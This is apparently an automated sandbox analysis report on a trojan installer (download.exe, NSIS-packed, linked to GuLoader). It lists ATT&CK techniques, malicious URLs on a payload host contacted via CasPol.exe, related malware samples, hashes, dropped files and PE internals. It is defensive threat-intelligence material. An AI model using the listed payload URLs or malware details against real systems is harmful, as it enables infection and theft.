          Native API          		1
          DLL Side-Loading          		1
          Access Token Manipulation          		1
          Masquerading          		OS Credential Dumping21
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
          Process Injection          		11
          Virtualization/Sandbox Evasion          		LSASS Memory11
          Virtualization/Sandbox Evasion          		Remote Desktop Protocol1
          Clipboard Data          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)1
          DLL Side-Loading          		1
          Access Token Manipulation          		Security Account Manager3
          File and Directory Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
          Process Injection          		NTDS3
          System Information Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer12
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information          		LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          DLL Side-Loading          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\lang-1032.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.download.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          2.0.download.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://37.139.128.83/2-2100%Avira URL Cloudmalware
          http://37.139.128.83/2k100%Avira URL Cloudmalware
          http://37.139.128.83/2100%Avira URL Cloudmalware
          http://37.139.128.83/2Data100%Avira URL Cloudmalware
          http://37.139.128.83/2M100%Avira URL Cloudmalware
          http://37.139.128.83/2W7100%Avira URL Cloudmalware
          http://37.139.128.83/2R2100%Avira URL Cloudmalware
          http://37.139.128.83/2e100%Avira URL Cloudmalware
          http://37.139.128.83/l100%Avira URL Cloudmalware
          http://www.avast.com0/0%Avira URL Cloudsafe
          http://37.139.128.83/2gsLMEM8100%Avira URL Cloudmalware
          http://37.139.128.83/2$2100%Avira URL Cloudmalware
          http://37.139.128.83/262hk100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://37.139.128.83/2false
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://37.139.128.83/2-2CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://nsis.sf.net/NSIS_Errordownload.exefalse
            		high
            http://37.139.128.83/2MCasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://37.139.128.83/2DataCasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://37.139.128.83/2kCasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://37.139.128.83/2R2CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://37.139.128.83/2W7CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://37.139.128.83/2eCasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://www.avast.com0/lang-1032.dll.2.drfalse
            • Avira URL Cloud: safe
            		unknown
            http://37.139.128.83/lCasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://nsis.sf.net/NSIS_ErrorErrordownload.exefalse
              		high
              http://37.139.128.83/2gsLMEM8CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://37.139.128.83/2$2CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://37.139.128.83/262hkCasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              37.139.128.83
              		unknownGermany
              		10753LVLT-10753USfalse

              General Information

              Joe Sandbox Version:37.0.0 Beryl
              Analysis ID:830512
              Start date and time:2023-03-20 13:11:48 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 17m 48s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
              Number of analysed new started processes analysed:18
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:download.exe
              Detection:MAL
              Classification:mal76.troj.evad.winEXE@4/5@0/1
              EGA Information:
              • Successful, ratio: 50%
              HDC Information:
              • Successful, ratio: 21.3% (good quality ratio 20.9%)
              • Quality average: 88.9%
              • Quality standard deviation: 21.4%
              HCA Information:
              • Successful, ratio: 78%
              • Number of executed functions: 57
              • Number of non-executed functions: 82
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, fs.microsoft.com, login.live.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com
              • Execution Graph export aborted for target CasPol.exe, PID 924 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              37.139.128.83New_Section_1.oneGet hashmaliciousAgentTeslaBrowse
              • 37.139.128.83/golden.pdf
              new.oneGet hashmaliciousSnake KeyloggerBrowse
              • 37.139.128.83/golden.pdf
              black.scr.exeGet hashmaliciousGuLoaderBrowse
              • 37.139.128.83/black/black.qxd
              drawings and specifications.ppaGet hashmaliciousGuLoaderBrowse
              • 37.139.128.83/black/fejlnormerne.pif

              Domains

              No context

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              LVLT-10753USsetup.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.246.221.154
              setup.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.246.221.154
              setup.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.246.221.154
              setup.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.246.221.154
              setup.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.246.221.154
              setup.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.246.221.154
              setup.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.246.221.154
              setup.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.246.221.154
              BBVA_REMI_ADVICE_---------------PDF.exeGet hashmaliciousLokibotBrowse
              • 185.246.220.85
              J3H3xpPLuS.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.246.221.154
              NEW_ORDER_IMP.xlsGet hashmaliciousLokibotBrowse
              • 185.246.220.60
              NEW_ORDER_IMPO.xlsGet hashmaliciousLokibotBrowse
              • 185.246.220.60
              https://login-applepay.comGet hashmaliciousUnknownBrowse
              • 45.88.67.56
              F4cejyW26j.exeGet hashmaliciousCryptbotBrowse
              • 185.246.220.246
              XFpT88EX6m.exeGet hashmaliciousRHADAMANTHYSBrowse
              • 185.246.220.89
              bWi6vHfild.exeGet hashmaliciousCryptbotBrowse
              • 185.246.220.246
              hMD6Q7iUUh.exeGet hashmaliciousCryptbotBrowse
              • 185.246.220.246
              QJyXW3rBrQ.elfGet hashmaliciousMiraiBrowse
              • 148.57.27.122
              installer.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.246.221.154
              Bi72BqnFQ5.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.246.221.154

              JA3 Fingerprints

              No context

              Dropped Files

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll5Ieb5xJWO6.exeGet hashmaliciousNanocore, GuLoaderBrowse
                xfsmHEylH8.exeGet hashmaliciousGuLoaderBrowse
                  5Ieb5xJWO6.exeGet hashmaliciousUnknownBrowse
                    xfsmHEylH8.exeGet hashmaliciousGuLoaderBrowse
                      RACE ENGINEERING SDN BHD 0203_Pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                        RACE ENGINEERING SDN BHD 0203_Pdf.exeGet hashmaliciousGuLoaderBrowse
                          FV-083471-23-02-22-269407#U00b7pdf.exeGet hashmaliciousAveMaria, GuLoader, UACMeBrowse
                            FV-083471-23-02-22-269407#U00b7pdf.exeGet hashmaliciousGuLoaderBrowse
                              IT01879020517_uGIim-xml-p7m#U00b7pdf.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                IT01879020517_uGIim-xml-p7m#U00b7pdf.exeGet hashmaliciousGuLoaderBrowse
                                  request for quote (Iberia Express Aircraft) 15-02-2023#U00b7pdf.exeGet hashmaliciousAveMaria, GuLoader, UACMeBrowse
                                    request for quote (Iberia Express Aircraft) 15-02-2023#U00b7pdf.exeGet hashmaliciousGuLoaderBrowse
                                      file.exeGet hashmaliciousGuLoader, RemcosBrowse
                                        file.exeGet hashmaliciousGuLoaderBrowse
                                          Invitation to Bid Quotation 15-02-2023#U00b7pdf.ex.exeGet hashmaliciousAveMaria, GuLoader, UACMeBrowse
                                            Invitation to Bid Quotation 15-02-2023#U00b7pdf.ex.exeGet hashmaliciousGuLoaderBrowse
                                              TNOR_CYCLE_C2_220006954787_32106010359796_E_BDA_0_E_20221211_112633#U00b7pdf.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                TNOR_CYCLE_C2_220006954787_32106010359796_E_BDA_0_E_20221211_112633#U00b7pdf.exeGet hashmaliciousUnknownBrowse
                                                  black.scr.exeGet hashmaliciousGuLoaderBrowse

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll

                                                    Download File
                                                    Process:C:\Users\user\Desktop\download.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):11776
                                                    Entropy (8bit):5.825582780706362
                                                    Encrypted:false
                                                    SSDEEP:192:yPtkiQJr7V9r3Ftr87NfwXQ6whlgi62V7i77blbTc4DI:N7Vxr8IgLgi3sVc4
                                                    MD5:FBE295E5A1ACFBD0A6271898F885FE6A
                                                    SHA1:D6D205922E61635472EFB13C2BB92C9AC6CB96DA
                                                    SHA-256:A1390A78533C47E55CC364E97AF431117126D04A7FAED49390210EA3E89DD0E1
                                                    SHA-512:2CB596971E504EAF1CE8E3F09719EBFB3F6234CEA5CA7B0D33EC7500832FF4B97EC2BBE15A1FBF7E6A5B02C59DB824092B9562CD8991F4D027FEAB6FD3177B06
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: 5Ieb5xJWO6.exe, Detection: malicious, Browse
                                                    • Filename: xfsmHEylH8.exe, Detection: malicious, Browse
                                                    • Filename: 5Ieb5xJWO6.exe, Detection: malicious, Browse
                                                    • Filename: xfsmHEylH8.exe, Detection: malicious, Browse
                                                    • Filename: RACE ENGINEERING SDN BHD 0203_Pdf.exe, Detection: malicious, Browse
                                                    • Filename: RACE ENGINEERING SDN BHD 0203_Pdf.exe, Detection: malicious, Browse
                                                    • Filename: FV-083471-23-02-22-269407#U00b7pdf.exe, Detection: malicious, Browse
                                                    • Filename: FV-083471-23-02-22-269407#U00b7pdf.exe, Detection: malicious, Browse
                                                    • Filename: IT01879020517_uGIim-xml-p7m#U00b7pdf.exe, Detection: malicious, Browse
                                                    • Filename: IT01879020517_uGIim-xml-p7m#U00b7pdf.exe, Detection: malicious, Browse
                                                    • Filename: request for quote (Iberia Express Aircraft) 15-02-2023#U00b7pdf.exe, Detection: malicious, Browse
                                                    • Filename: request for quote (Iberia Express Aircraft) 15-02-2023#U00b7pdf.exe, Detection: malicious, Browse
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    • Filename: Invitation to Bid Quotation 15-02-2023#U00b7pdf.ex.exe, Detection: malicious, Browse
                                                    • Filename: Invitation to Bid Quotation 15-02-2023#U00b7pdf.ex.exe, Detection: malicious, Browse
                                                    • Filename: TNOR_CYCLE_C2_220006954787_32106010359796_E_BDA_0_E_20221211_112633#U00b7pdf.exe, Detection: malicious, Browse
                                                    • Filename: TNOR_CYCLE_C2_220006954787_32106010359796_E_BDA_0_E_20221211_112633#U00b7pdf.exe, Detection: malicious, Browse
                                                    • Filename: black.scr.exe, Detection: malicious, Browse
                                                    Reputation:moderate, very likely benign file
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....~.\...........!..... ...........(.......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text...O........ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\Afreager.For

                                                    Download File
                                                    Process:C:\Users\user\Desktop\download.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):310762
                                                    Entropy (8bit):7.153872132508062
                                                    Encrypted:false
                                                    SSDEEP:6144:gjumg/DuSWsGx6RZLOMqkcjpwn2+3VJInGwhTFLI:gjumgbhWsGWZ+kcj2n2OJInJhTS
                                                    MD5:A1C8FEE704DB305175D7A96481B66C73
                                                    SHA1:F26BE75182187BB5AA73C170605CF171D62DC023
                                                    SHA-256:004CC2CA7789AB32D71678F5174DFC0F8EF1BA70A457929037E8CE0E4FD625C2
                                                    SHA-512:4F5865B975DDD54A7770D89A28ADD620C5A675225F8F7974E68A6173B33C6FCA853D98AD1E2B054147B2ACD6C810BF90A252C30034973AB08B9CBACD69E6B965
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\Poserne\Bedugget39.Rus

                                                    Download File
                                                    Process:C:\Users\user\Desktop\download.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):142071
                                                    Entropy (8bit):7.998708530523099
                                                    Encrypted:true
                                                    SSDEEP:3072:NZcIfJJvbMxWCmEblH1ZC0+UM53+9I1dPg4kh89+08iFRbleoK:5DMxW4fz1e3+9Sg9Z1iFRleoK
                                                    MD5:2CB77C7D9E16C0EF410FA8BC1CC1185A
                                                    SHA1:0FCBA04A0B4B4563D62A073080E173590BEEBEDD
                                                    SHA-256:A0BFB53FAD74C41F699F171902C1D6A0AC33A81963697A3F674234B2FF36203A
                                                    SHA-512:33FDB3488F9BF085D7CDA649984BAE271194ECB64B569B5BDB1D09DE48C5D5407D75CDC2EA1A59E8E199F821CE4DA5F101D0A7CAA44E544E78C8D8507B6BC751
                                                    Malicious:false
                                                    Preview:>2'...JuK.(p@wC..D.5i....C....M%.*..O.0D.]...N.........%...*xu...k).~.Pz..1/....*..}a.........._........`.a.k.N%Ze..a..o~..=..\...^'...v/.\K...\.....5.......B..{.A..t..vh.....sl}*...Fft>..`....`.>.27(...J..........u{..csucM...a.V.'..a<.N3f.$......%@h8G..).G.>..M{....o...3..~X...w.AS.X...7.Y...v2..+....!u.... n&..vt..FR#s..w.j...........}...J...sA..w.......L@....+X3dq(.; ...k|....i...G.....z~sF`Q}a....[..Q...I.........A..[.?...i.D..e..$d..e..KC....4+J....c...'.">6R.2.0....<R+.}.H0)u49..oK.v._...F).8.e..J..;.!....[.&E...V.....[.%.H....p3..*.....M.!.`,WX..J....an.e..h.u%P...{.....s...Q.._/.e?..R,..$)..N.^.P..Z\...mj8*D.<3...ke...j...W...9..7D.I?...Zp|.3.......M.s.S.4....!l.].aW.=v..Q...9..?...u...0.N....Sg....~..8....,.[./......8P\....S..k.....\.._...[=.P.....d./gKdP-_.5BU..u2u6x...)..E..`.{..@.....!.......g.j.r.\.6.\.+...vr.b..oE..h.;..I.,...(......=.d..p./lr)*...bH....gjJ..........:.x...K)xh.C...../....L..~B..Vh..l.zb.V.6qm...p..ER

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\lang-1032.dll

                                                    Download File
                                                    Process:C:\Users\user\Desktop\download.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):178696
                                                    Entropy (8bit):4.4006904456537335
                                                    Encrypted:false
                                                    SSDEEP:3072:A8kCKqgt37ZJvMQSOnMIomX6YZVG5dWCR7+nyadqLEzBUyQj2UGBOyj:CvM7yj
                                                    MD5:8AD3A9D8C3DDA9854C13D213D00A8DB8
                                                    SHA1:74283E98F0426DFA7854CEEF9BA43217F39DAB36
                                                    SHA-256:DA07C1D13136E3BAABB9D0598AF99BCB48898BF5DBCA0F0477602BEA957198E9
                                                    SHA-512:C30CA6FA4A62A6383C15AB8B95CD88714AF5C3A63F7FC9C8F767FED18E295B885B765B630831F456D16DB5DA7AA037CA931FCB3F412AB95A8D5E46B1B44497CA
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.@...R.@.P...R.Rich..R.................PE..L....\)b...........!......................................................................@.......................................... ..`................ ...........................................................................................rdata..p...........................@..@.rsrc...`.... ......................@..@.....\)b........T........................rdata......T....rdata$zzzdbg.... ... ...rsrc$01.....@...s...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\microphone-sensitivity-low-symbolic.symbolic.png

                                                    Download File
                                                    Process:C:\Users\user\Desktop\download.exe
                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):291
                                                    Entropy (8bit):6.913400639640828
                                                    Encrypted:false
                                                    SSDEEP:6:6v/lhPysSFX/Fd8cy2TY3594VW6yTpm/v4pRw+jGbcnFbp:6v/7yFvn8cGJkv3twD
                                                    MD5:303E1921A67BAE379BC4B36352F391AA
                                                    SHA1:AB361F32C8F1811EC7DB6EB96DAD417753323DB4
                                                    SHA-256:1FC1141E644151384931853426BD36B5293BCAFE380189515850B9CC8FF158D7
                                                    SHA-512:0A355819B8EB530A30710D536CCF6F5AACA7E9050C7CA9F591E31DC8BCBCEFC83EC9EA5B1E3B9356D64A66B42D04A0DD504A97B7AFC6CA35E7CED23A82A74C93
                                                    Malicious:false
                                                    Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...1N.Q........V6R.H....w...A.`.5v..`mK.ZH.Z8.l`.l._2y......k..8....a.il...8.~.I@.Y.Le.'<G.....a....h...W@.q.3..n..(jb.P.`......X....1..1...!f./..h.~..!..q....3...x.g.7u.{St3......w./Q..g.....*a.]..T..T.~.?.+2.pM......IEND.B`.

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Entropy (8bit):7.546765550553085
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:download.exe
                                                    File size:680560
                                                    MD5:064fa36da0c2ca360b0906cc5bfe67c6
                                                    SHA1:a6623c33cbd86bdaee063f897bea1692621494e5
                                                    SHA256:6974c5051372213d0e90147660c4b21bfff238e20c6449acb19f1901bf4729c8
                                                    SHA512:39845a084b66442a1eb114621df67fe6db88e758b4564b79c01eff6a1935dcaba4149f0d3c68e243258b7da5f3ce197a904e226f561a0dfc1377ff22419a6026
                                                    SSDEEP:12288:Z4oLK6+zAX00AF1pOSJe3xbIvli343lKZwIcBRPgYxFz18+t9Z1kU:6PQ00AF1pOSJeBUyqKKrf318U9Z1z
                                                    TLSH:F2E4F15A2B7AC815D065E9F85AE3C50D5C749E14183CABD25BB1283EEBFC2527B0F047
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........s.../...............+.......Rich............................PE..L......\.................b....9....

                                                    File Icon

                                                    Icon Hash:c4ccc6e6e4f6f640

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4031e9
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x5C157F01 [Sat Dec 15 22:24:01 2018 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:3abe302b6d9a1256e6a915429af4ffd2

                                                    Authenticode Signature

                                                    Signature Valid:false
                                                    Signature Issuer:CN=barket, OU="Biselg Halo Uvitinic ", E=Strammende@Kummerfuld.Kur, O=barket, L=Middleton, S=Tennessee, C=US
                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                    Error Number:-2146762487
                                                    Not Before, Not After
                                                    • 24/01/2023 23:36:10 23/01/2026 23:36:10
                                                    Subject Chain
                                                    • CN=barket, OU="Biselg Halo Uvitinic ", E=Strammende@Kummerfuld.Kur, O=barket, L=Middleton, S=Tennessee, C=US
                                                    Version:3
                                                    Thumbprint MD5:F856691DCF4BB6A788E55B70FE388011
                                                    Thumbprint SHA-1:0C5E3286DBBB50FA720930F437DDBC472FF1EFDF
                                                    Thumbprint SHA-256:7BCC618A115B3494BA1A7F1A5EDFACF31559C85478D2F90A7916E2A476BCF411
                                                    Serial:807C3D2B116DDE7C

                                                    Entrypoint Preview

                                                    Instruction
                                                    sub esp, 00000184h
                                                    push ebx
                                                    push esi
                                                    push edi
                                                    xor ebx, ebx
                                                    push 00008001h
                                                    mov dword ptr [esp+18h], ebx
                                                    mov dword ptr [esp+10h], 0040A198h
                                                    mov dword ptr [esp+20h], ebx
                                                    mov byte ptr [esp+14h], 00000020h
                                                    call dword ptr [004080A0h]
                                                    call dword ptr [0040809Ch]
                                                    and eax, BFFFFFFFh
                                                    cmp ax, 00000006h
                                                    mov dword ptr [007A2F4Ch], eax
                                                    je 00007FBDE865E5C3h
                                                    push ebx
                                                    call 00007FBDE866169Ah
                                                    cmp eax, ebx
                                                    je 00007FBDE865E5B9h
                                                    push 00000C00h
                                                    call eax
                                                    mov esi, 00408298h
                                                    push esi
                                                    call 00007FBDE8661616h
                                                    push esi
                                                    call dword ptr [00408098h]
                                                    lea esi, dword ptr [esi+eax+01h]
                                                    cmp byte ptr [esi], bl
                                                    jne 00007FBDE865E59Dh
                                                    push 0000000Ah
                                                    call 00007FBDE866166Eh
                                                    push 00000008h
                                                    call 00007FBDE8661667h
                                                    push 00000006h
                                                    mov dword ptr [007A2F44h], eax
                                                    call 00007FBDE866165Bh
                                                    cmp eax, ebx
                                                    je 00007FBDE865E5C1h
                                                    push 0000001Eh
                                                    call eax
                                                    test eax, eax
                                                    je 00007FBDE865E5B9h
                                                    or byte ptr [007A2F4Fh], 00000040h
                                                    push ebp
                                                    call dword ptr [00408044h]
                                                    push ebx
                                                    call dword ptr [00408288h]
                                                    mov dword ptr [007A3018h], eax
                                                    push ebx
                                                    lea eax, dword ptr [esp+38h]
                                                    push 00000160h
                                                    push eax
                                                    push ebx
                                                    push 0079E500h
                                                    call dword ptr [00408178h]
                                                    push 0040A188h

                                                    Rich Headers

                                                    Programming Language:
                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x84300xa0.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c70000x37c28.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xa4d400x1530.data
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x60680x6200False0.671875data6.450713900012796IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x80000x12500x1400False0.430078125data5.041636133183931IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xa0000x3990580x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .ndata0x3a40000x230000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x3c70000x37c280x37e00False0.4934109340044743data6.083319493650987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_ICON0x3c74600x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States
                                                    RT_ICON0x3d7c880xd177PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                    RT_ICON0x3e4e000x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States
                                                    RT_ICON0x3ee2a80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States
